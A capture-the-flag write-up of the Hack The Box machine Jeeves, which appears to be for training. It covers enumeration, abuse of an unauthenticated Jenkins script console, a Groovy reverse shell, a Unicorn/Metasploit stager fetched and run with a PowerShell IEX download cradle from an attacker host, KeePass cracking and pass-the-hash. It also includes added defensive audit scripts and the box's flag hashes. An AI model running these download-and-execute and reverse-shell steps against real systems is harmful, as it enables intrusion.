# Jeeves

## Jeeves - 10.10.10.63

### Target Enumeration:

OS: Windows

IP: 10.10.10.63

User Hash: e3232272596fb47950d59c4cf1e7066a

Root Hash: afbc5bd4b615a60648cec41c6ac92530

### Ports / Services / Software Versions Running

```
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open  microsoft-ds  syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http          syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
```

### Vulnerability Exploited:

Jenkins script console (/script) reachable without authentication on port 50000.

### Privilege Escalation

Administrator NTLM hash stored in a KeePass database protected by a weak master password.

### Replicating the exploit:

Nmap TCP:

![](https://lh5.googleusercontent.com/VUik2C-zIMI5ZFDWUmpQIKrD0dhbMEveVI4P0LDl6ik9TxtNTatR9Uv5Mruad1ULb2-kq22UXNHc4_bl0MYcp4Pch36c4hvoBzeAzJJ0hVXESd-ftx1eHogd6Qyvuy6iHUZr0m2u)

Nmap UDP:

![](https://lh4.googleusercontent.com/SkQlCL2Hv-ngkw7cctqSkMqeiz2YV4y2rK2D5uJTCBZliUPoiaEpoO9NjNmZOel0qPyE2XVrOw8Fd9VrU6TC_KF0zm6FnhcE9dfQHxIltIiIsDamXTOKezDNvHywyq_T5m9yMIL2)

Nikto:

Port 80

![](https://lh6.googleusercontent.com/b7PkrhCumIEmuabh9s2U4hjXKq6ShhrGrpRoN-0OPoIUNh31ffbFT1zJzI__mE3xB3w-mNODpEZAupp6K361RtaoGJ0eaZs8k3sPoSgoJgVrFKYCk5Ha-iD66o84psPOeWHb0HUA)

Port 50000

![](https://lh3.googleusercontent.com/pR8rtVsYExo2ewtFpXKYUKZI5FifclmLfoNDitT1qgBWYFYDnSSUC0qlsg26Bo5WCZgcnuQZ5F9JAut8wz0gJDgRsboA7VUcV3-RY_835VB-oevl5wHrEdwgWIW0_oXwUxJuHy5P)

Dirb:

Port 80

![](https://lh6.googleusercontent.com/4O4blr6Plk0dIlYIuWX-yLSCgw-0kHMoV8uWUyb1l4thMjqtW7S2sDQ5ioeTj0btXkY0t-kv1XBEc_hdFqLUdvxamaDFdgfwqhQkG0ZoeDbfN_rMTktGQkgrlgv4JM6jcZbgiygQ)

Port 50000 brings back nothing.

![](https://lh6.googleusercontent.com/WiO4ulMYTVCBbVvGaI9QS_k11smDiwC8Ayd34S97EnY0eT9ul5uF9UPxjnMQrj5dZAv6e76BsFuCZeyS8qHTlHwVanZW_FAtX1ojH_y4oUMyAFpRuE8pPQmftHEIpq-mXiwe_c0b)

Dirbuster:

![](https://lh5.googleusercontent.com/yE7mdI_mKPHOT7Aub9t_45by_bathUkKc_KcInfrlPgIVHYvLwHmtVR6OkG2LWs8p3v1FmsNr2togyJNdJTZpSTJYDTO4y3zwUbmGtwYAP6-961_nGztheG_g4SGXAf4fIST6gNW)

Nothing found on port 50000.

/askjeeves on port 50000

Enum4linux brought back nothing.

Browsed to port 80 and it is a search bar which always gives you this:

![](https://lh5.googleusercontent.com/FPt-fhAH61HK4JvquOiQi035BcERG5AK5vgcnPiHlLiBrIG-fTruxVaGSvjzekDCXrPl282OiLoQn3qm4Jr8LXYqnrtb1PWgEd6sIFV_AkWvK6FHFGygvxq5VG5qO9bELGp7OrOi)

Source code:

![](https://lh4.googleusercontent.com/T1VnAspvCGfOSDkTP9HajXBg0GE3-7E6uU7pESb7yA5MwU84EcWYHr0IalM-tD4Tb0mk4EyKXX6ugnGyDUpbONKp9-GR2awWBp_qyWSeqeZE4ywfPYxjJyK1saWob4sXKISmWIk_)

Response from the initial web page:

![](https://lh3.googleusercontent.com/-n4LEJkPOswgH4J4yXWp51onxymsD3T4pMFifWKBL5ialnDOVFPPt7FUlM4Jx2ZSr1SjI3qMMvUghR3kaEFpKH_taw7X-k-Vpp942VcdrfrgFsZjfo42JpipW3ahpyk91Ssp0kke)

Downloaded the image and ran it through strings and binwalk, which brought back nothing.

![](https://lh5.googleusercontent.com/gtres__0bBTASANQ2IRv8iDgH-GSKZ4BGk9NSX1_XUygc42G-YxWQ4SOh97_zv7GVQxpXmAlisD3HiD-vRdePKQqCe5VTn1fbDHTuZaPRFEoaVF3Bd0gezX2-3pRhFzmJMeevxPO)

This is an image, not a verbose error message, which suggests it could be a troll.

Downloaded the main image as well and checked it with strings to see if it had anything in it.

Browsed to port 50000 and you get this:

![](https://lh4.googleusercontent.com/Yc4VRbVxBf4AvVU2-zy5Tblh8vXmg6ylUx7uMur1k9VtOiGkvwAMU5OecFk8ufe-6IjMDrFBBgHgSJqEimFYeCwh4kX_J3PvGTzjvEVlAiNgTfYPkDPpK-S_9AhsWQoNfpIdatHB)

Potential software version: Jetty:// 9.4.z-SNAPSHOT

<https://www.exploit-db.com/exploits/36318/>

```
dotdotpwn -m http -o windows -x 50000 -h 10.10.10.63
```

Also tried:

<https://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html>

Not vulnerable.

![](https://lh6.googleusercontent.com/kgju4rEnVMHEPMqvzOrS837ycckQDqCwqoTgUMP_S6VJTzUhLoOcfA0egQfRx5OhteHTCBD43HgkxYrbJ0tlk6fn_KIO8M3hrUV2PJBm50Mb2KAklu7tHiqbna6HonhECYesXekF)

Come back to this.

Finally found some directories:

![](https://lh4.googleusercontent.com/zqfvkUD5hJy_pjB31IRt960SN1vpFjPHi47K0X5u9IQKEq-7REjXhDjIlakSPHB8E3_9Ip4aDL0EE3OuFoIQJ2aYFm4fLZi-Np6joLtw-wHSY4_DmnQocN4hkpjmvMMSOpSfXwhn)

Dirbuster:

![](https://lh6.googleusercontent.com/fxCS0nYJYcLIgwQbgfPwAG-3O4g9lpZijwi6hVscrYZa4ap-nDU05eKgF0xv12l1WcxKFfuK5egi821pVuq8KXNA8erpWz4BpfNZzGqBDSoYFKucZz1qX2s0eR7mhRlP1301iEU0)

![](https://lh3.googleusercontent.com/1sCsr5URsanpzbeQ5i5Lrjgh1AEaOGS1rje-mXBCoXVDeDlRz4-nvCNo0pIHESW2P49uPNKpfqc8BhN6JmPGw_nvDU-YJp7KD8XtGFuPVuUbKvVofBVNpSzkkD_1I2ly2lWlTfkt)

![](https://lh3.googleusercontent.com/YqTbcqVqo7y1u5quPuO0NARzdmTDWjqEx0djGsKGCPuc1dIqe5CK4zoLejXwbpFwWaxPJvdMXOPC9wJW3TRg7swPH3VklskQ333w9Oz-nXw5p3HyHe5egkzOQsx5Fc2tVUHmKCvj)

![](https://lh4.googleusercontent.com/5GeqcSXQXN9S64IPMRq4IGsV-43azpzVxdZNH8iVX6wENqkXjJc2E-OpM5qbVIDNHDy8svdR_-mf3mCpidIUzSWz7EOAHS68LmyYnNPofu0VVcCKYmpocASwBX4vpmYX91HbRpoN)

![](https://lh4.googleusercontent.com/5QDmC5g9WkbURBJVAOWllYH5QzgoCI90F85wWbnbGjywkhtQAM6gpKTnS91OS2Qh5np23jFbOVLxub-or6-mzZbY714SW2e5WJ49HNDk7pVnffdjEWf_SZsz-THszY5SH05Uzetw)

Searchsploit brought back:

![](https://lh4.googleusercontent.com/0y2cDJ78BppKS0G2_HXlxhk14sAozq1uoGqf7qWqWExxVLQ_ormhghqBiO1oLTI8hIUjP-wod6npH1A_0ZZ2fOvfBBHBn9d2_hAfqZfyQY1LaF_5AQNS3cCy_aFvoocY6CI1ko_P)

Metasploit brought back:

![](https://lh3.googleusercontent.com/Tk-M1DTH1X0vYTptrhmhLvOTeBAm0K9-cyhf5xsqYGux1-20yWovTrHi3WVXXCvdkEzpygP9Ew27C_5yuG_6ulsRxbBThNo2FaKz-puxeaY0P0Jn3NVFSnDydRrNERrTAXAFJJ1f)

None of them worked.

Found a way to execute commands via a Groovy script in the Jenkins script console:

Found revsh.groovy:

<https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76>

Download it from GitHub and modify it:

![](https://lh6.googleusercontent.com/EitVLRuZQFalkM1ZO7eiazZ_iW9lEMQkDV9fb0LxvRdM3xEAK2pABhpG3lK0-GgxtjTAEFJtP9m1z79MRac4stWMWIOAPEWgW9MwuN9oy0b1LJ0EAWwTvmr3KXQJlbF6XYk3M6g9)

Paste it into the script console:

![](https://lh4.googleusercontent.com/qIiJGCF5ec9Nr2MOAPQXZpJidtwBBqsdUccmdt3aKw7mJMzX_g7914LiTdL4qMiRVjdD7veq3boV36FaSGKDLrjqKgcZQKS0ksCxIQBLcb0iIJK6CgDQw5-Ppkaq5dWdq51IjRDA)

Execute with a listener on port 443:

![](https://lh6.googleusercontent.com/lM8RYKoMc7rivbsZ-tK3IUkuW9pWJ4kqHE22LrsEeOfVFcQyf2tm36GcGiztJwzB2KydwSPrFoG1RmUC0ZAtIighuWZJSUgsWGqdNbD0fQs2lTxbRCPxMfUdXEzpupeF_XZFXTox)

Use the following to download files to the system and convert to a meterpreter shell:

```
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
# generate the PowerShell stager and the matching handler resource file (LHOST LPORT)
python unicorn.py windows/meterpreter/reverse_tcp 192.168.0.1 443
# serve the stager over HTTP so the target can fetch it
python -m SimpleHTTPServer 80
```

In a new tab:

```
# rename the generated stager to the name the target fetches, then start the handler
mv powershell_attack.txt Shell.ps1
msfconsole -r unicorn.rc
```

On the victim machine, from a command prompt:

```
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8/Shell.ps1')"
```
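The misconfiguration this box turns on is a Jenkins script console that answers anonymous requests. The following PowerShell function is an added audit check, not part of the original writeup: it sends one unauthenticated GET to `/script` and reports whether the console is exposed or correctly refuses the request. The base URL and the assumption that the console page contains the text "Script Console" are mine.

```powershell
# Added example: audit whether a Jenkins script console is reachable without credentials.
# Assumes the instance lives at $BaseUrl (on this box: http://10.10.10.63:50000/askjeeves).
function Test-JenkinsScriptConsole {
    param(
        [Parameter(Mandatory)][string]$BaseUrl
    )
    $url = "$($BaseUrl.TrimEnd('/'))/script"
    $status = 0
    $body = ''
    try {
        # No credentials are sent; a locked-down instance must answer 401/403 or redirect to login.
        $resp = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
        $status = [int]$resp.StatusCode
        $body = $resp.Content
    } catch {
        # Both Windows PowerShell (WebException) and PowerShell 7 (HttpResponseException)
        # expose the HTTP response on the exception for non-2xx answers.
        if ($_.Exception.Response) {
            $status = [int]$_.Exception.Response.StatusCode
        } else {
            throw
        }
    }
    # Assumption: the console page carries the heading "Script Console"; a redirect to the
    # login page also returns 200 but lacks that text, so it is not counted as exposed.
    $exposed = ($status -eq 200) -and ($body -match 'Script Console')
    if ($exposed) {
        $finding = 'Anonymous access to the Groovy script console: code execution as the Jenkins service account'
    } elseif ($status -in 401, 403) {
        $finding = 'Script console requires authentication'
    } else {
        $finding = 'No console page returned; inspect the response manually'
    }
    [pscustomobject]@{
        Url     = $url
        Status  = $status
        Exposed = $exposed
        Finding = $finding
    }
}

Test-JenkinsScriptConsole -BaseUrl 'http://10.10.10.63:50000/askjeeves' | Format-List
```

Run it again after restricting anonymous access in Jenkins (Manage Jenkins > Configure Global Security) to confirm `Exposed` flips to `False`.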

Run the local exploit suggester against the host.

Drop into a shell and download tools:

![](https://lh6.googleusercontent.com/QmOYmrvMy1J3CyzXqZ7IbvXFeQ6b_XevIhhYfEFqGtOygIU9bEpcgM39P72aNWPk5O9bYMMJyZthOW8AzO6xJNtjMCqx_cBNHZ3LIw2ISsubeZQlfDq4ZUy5tEWvhh11DdEcLBG9)

PowerUp.ps1

![](https://lh5.googleusercontent.com/kFiK_huONR6myZLFZxRDmO6mWl7loyGXfJ4dU9GheKDpkCpdR4xAiJ5ie0bXlbry2lYJP4r2GSyZSftFkvRi2SQrc3iu1a92k96gBzi1N2CRKLjlc-75GSGSoF2BC1DAgG9jTvJV)

Service found:

![](https://lh4.googleusercontent.com/EQywO4a5BydSYU6JIbciyFG_o4u-nOOPQ8LwbgyPH9BBtiS3EwopV1Tk_Nchv5in4S-ThQjFEJ8ajHFFSfSC4En0Sbti4J2Ko-UeTADC79PLIIkMbAp02EU1ralMtSmSo8brdEu9)

No exploits worked so far, so start digging around the system.

We found the following credentials in credentials.xml in the Jenkins directory:

![](https://lh6.googleusercontent.com/7ngaECPtHj8C07xm-3qH3v78zkczU1oQJVQRYty-tGoZZ8NpBNs9Il49cKIgLcxEzujKxAKQtx0Ss2Diel5jbNNfnhe2qM4qcSKHQKWLXBJZnvlPyh6tUjw7IK0WyV5scGvqfRtx)

These are encrypted, so run the following via the /script console on the webserver and you get the password admin:

![](https://lh5.googleusercontent.com/3kj8LcrZOv-hdE0qhRux2fXWvEiSH3ARAzYzs2-A0Ot_FO2-VWMDXHqfi-r30XsHTSDDbzi9Aw7Ul4qrBe_suAnKnvajD6qANMA0BLY2WOueBRPFMURQWGYdi4WPa9VO-JCrgAht)

Search for other passwords:

![](https://lh4.googleusercontent.com/63Mw77MAvs_stRfQhxfJmGrHf50w1WVxY-cOnxyUbTVLIUdDkdbAqDhzrdmwh70IZTOJaz7dW9VDvIXNhoOx-gTZGu5QRC0nL1YP_L1s8eJzZiblUFyEQRV8f1RdJ3OzTLRiq8UC)

Once cracked, this gives you admin:admin, which is of no use for privesc.

Digging around the file system, we find a KeePass file called CEH.

Download the file locally and crack the master password:

![](https://lh4.googleusercontent.com/c1MeXWnyttMZHgFkHENvJpANqCJ9w3Ibx3p-rw3I3HXktu1T4Gq9E75fdFf1q_zK1e8VzQ7Fq1ekmgTUG1k2pPPPQ6kJDaWIUqlKGWl0bnbk054JOfDrA1usP-jx9D6rpv9FWfoK)

Install kpcli:

```
apt-get install kpcli libterm-readline-gnu-perl libdata-password-perl
```

Inspect all of the entries:

![](https://lh3.googleusercontent.com/nNvXNB0WW5PfdZotLeXLqszMrlbSttQJhfnXFvwWZg9qqxB1DasMt7gb2At5n9VKOd4jY2Atpzai4ssQxOB4N5IpLuBqlI7EH-0YueNMB-xqSXaaLfv0DK1oedPUOUm6mIA2Bc5l)

Looks like an NTLM hash:

![](https://lh5.googleusercontent.com/_Hmf0wulind6L9l71c5xL66E5OFZYZ41IPFrRA4lIuqU0xzy8RYPM1DPu_WjO09HA4JYJAzI-OhVzcDR3cEw5SHvSveV2Q1m5-O7YL5OAw7RDZ3SQJVI_Nh6p_f_WipkOPSLUZL2)

Use pass-the-hash to log in to the system:

![](https://lh6.googleusercontent.com/jDapmOCHjcKrlz4i3BQpRmM48-C069gyDkfwoaASxhhkbGpAgV_6Kwr5kb4MLHRoJqbETkNN_hLs49YehRj7YCb9rVNCk1NL4qfArqTnJGpkm5Jh6T_YfCbbAa-rNldAMnZyG7x4)

Upload a Windows shell via our low-privilege account and execute it via pth-winexe:

![](https://lh6.googleusercontent.com/NlHki3kKkJLM9d9ZTpwIl5jny33GEIRFHBn6VvXABEFfp4lm7q3hutLm7qUsbLEzH9MTdGMkq4H98wfgkqc_FDeEkEYSzDXZ5Y0xRV7ZQnBItxm63yLGaN4Fp10xk_D1df0Hst97)

Interact with the meterpreter shell:

![](https://lh6.googleusercontent.com/-tpxmR98tgf122q-OQ_hPmUgV6FoQgiC0WwQ8fFkDKooQpfAXYzorAZH7Hf4Ilrzk09IKNB5ueiVSIMLWm4MqcabSU8mf10xoCm8RfpHv-VFuQD-Zv0uXiWZEz6E7FYfTeckl4JR)

Grab your flags:

![](https://lh4.googleusercontent.com/AfMW6lWITodi0OAiQrOU04WDlORROZKHycH0liYk5CDfEzedXfMBolL3hpOcZokHPIuaPmGbYMxED8W9YiUT6E3zJNXmsArXXi06wR1EaxVZ4v8qIfPQwkwgJi3cg0hHVqOINufl)

View the alternate data stream to read the root flag:

![](https://lh4.googleusercontent.com/8isUHhxWBu3VWOFBSdM3ykFh6r3eYsxVgpzFyqX0TFv0aI_N3qxRlko_c5uqbxIK6id2pj9R9eh_rLjpNHpwOLtvxfrzI_IAvoZAyMMxKnKuwFw93kISQMfJrWbZ2RL1-78RZt04)
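The root flag is hidden in an NTFS alternate data stream, which `dir` and Explorer do not show. The following PowerShell is an added example, not from the original writeup: it walks a directory, lists every stream other than the primary `:$DATA` stream, and reads a named stream back. The starting path is an assumption; the same check works for spotting hidden content anywhere on an NTFS volume.

```powershell
# Added example: enumerate alternate data streams (ADS) under a directory.
# Assumes PowerShell 3.0+ on NTFS; the path is an assumption for this box.
function Find-AlternateDataStreams {
    param(
        [Parameter(Mandatory)][string]$Path,
        # Zone.Identifier is the normal mark-of-the-web stream on downloaded files;
        # it is noise for this purpose unless explicitly requested.
        [switch]$IncludeZoneIdentifier
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # -Stream * returns one object per NTFS stream of the file.
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
        } |
        Where-Object {
            # The primary content of every file is the unnamed ':$DATA' stream; anything
            # else is an ADS and is worth a look.
            $_.Stream -ne ':$DATA' -and
            ($IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier')
        } |
        Select-Object FileName, Stream, Length
}

# Read the contents of one stream once it has been found.
function Read-AlternateDataStream {
    param(
        [Parameter(Mandatory)][string]$File,
        [Parameter(Mandatory)][string]$Stream
    )
    Get-Content -LiteralPath $File -Stream $Stream
}

# Usage on this box (path assumed):
Find-AlternateDataStreams -Path 'C:\Users\Administrator\Desktop' | Format-Table -AutoSize
```

Feed a hit from the table to `Read-AlternateDataStream -File <FileName> -Stream <Stream>` to print the hidden content.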

